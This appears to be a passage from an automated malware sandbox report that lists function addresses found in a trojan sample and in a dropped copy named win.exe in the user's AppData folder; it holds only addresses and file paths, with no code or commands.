            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4638
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B3E30
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0A37
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4E36
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8E4B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0E4D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B3244
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B6253
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B1265
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B7E78
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4A73
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B3275
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0A88
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8E8C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0E80
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4A87
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4E99
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4694
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4AA0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B62A4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0EB3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B12DC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B46D3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8ED0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B1ED7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B630B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B2B01
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4300
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4B00
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B1313
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4F14
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0F2F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4B2D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4B25
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B2F3E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B1F3C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B2B37
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4B5C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B1F52
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B2F50
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B136B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B3B6F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B6363
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B3B60
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B1F7F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4F8C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B2B83
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0F9B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4797
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B2FA8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B3BAF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B63AC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4FB8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8BBE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4BB0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B2BD8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0FEB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B47F4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B3C0C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B641B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4C16
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0C25
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B3C3F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B2C33
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B104C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4847
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8C44
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0C5B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4C68
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8C6D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B3063
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B247D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B6480
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4899
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B2C94
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B1094
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0CA6
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B10CB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B44CF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0CC1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B44C0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B30C4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B64DB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8CDA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B2CD9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B5CD9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B98D8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B48E3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4CE4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B5CE4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B60FA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B28FE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0CF3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B98F3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B3114
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8D14
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4D2A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B5D21
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B1120
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4520
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B093E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B2D30
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4948
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8547
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B095B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8D5C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B9951
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B116C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B317B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8D7E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B5D71
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4570
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B2D88
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4D83
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4985
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0D91
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B41A7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B45B5
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8DC3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4DE9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0DEF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B45E0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B45E4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B45F9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8DFF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B09FD
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B31F4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B49F4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B623F
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0816
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0CBA
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B5CB3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B98CB
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B1D2E
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B1204
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4A27
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4638
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B3E30
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0A37
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4E36
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8E4B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0E4D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B3244
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B6253
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B1265
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B7E78
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4A73
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B3275
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0A88
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8E8C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0E80
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4A87
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4E99
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4694
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4AA0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B62A4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0EB3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B12DC
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B46D3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8ED0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B1ED7
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B630B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B2B01
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4300
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4B00
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B1313
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4F14
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0F2F
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4B2D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4B25
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B2F3E
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B1F3C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B2B37
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4B5C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B1F52
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B2F50
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B136B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B3B6F
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B6363
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B3B60
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B1F7F
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4F8C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B2B83
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0F9B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4797
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B2FA8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B3BAF
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B63AC
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4FB8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8BBE
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4BB0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B2BD8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0FEB
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B47F4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B3C0C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B641B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4C16
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0C25
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B3C3F
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B2C33
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B104C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4847
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8C44
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0C5B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4C68
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8C6D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B3063
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B247D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B6480
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4899
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B2C94
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B1094
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0CA6
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B10CB
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B44CF
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0CC1
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B44C0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B30C4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B64DB
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8CDA
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B2CD9
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B5CD9
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B98D8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B48E3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4CE4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B5CE4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B60FA
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B28FE
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0CF3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B98F3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B3114
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8D14
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4D2A
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B5D21
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B1120
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4520
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B093E
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B2D30
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4948
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8547
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B095B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8D5C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B9951
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B116C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B317B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8D7E
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B5D71
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4570
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B2D88
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4D83
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4985
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0D91
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B41A7
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B45B5
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8DC3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4DE9
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B0DEF
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B45E0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B45E4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B45F9
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B8DFF
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B09FD
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B31F4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B49F4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0816
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A98CB
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0CBA
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5CB3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A1D2E
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A623F
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A247D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4C68
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8C6D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A3063
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0C5B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A104C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4847
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8C44
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A3C3F
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A2C33
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0C25
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A641B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4C16
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A3C0C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A60FA
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A28FE
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0CF3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A98F3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A48E3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4CE4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5CE4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8CDA
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A64DB
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A98D8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A2CD9
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5CD9
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A10CB
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A44CF
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A44C0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0CC1
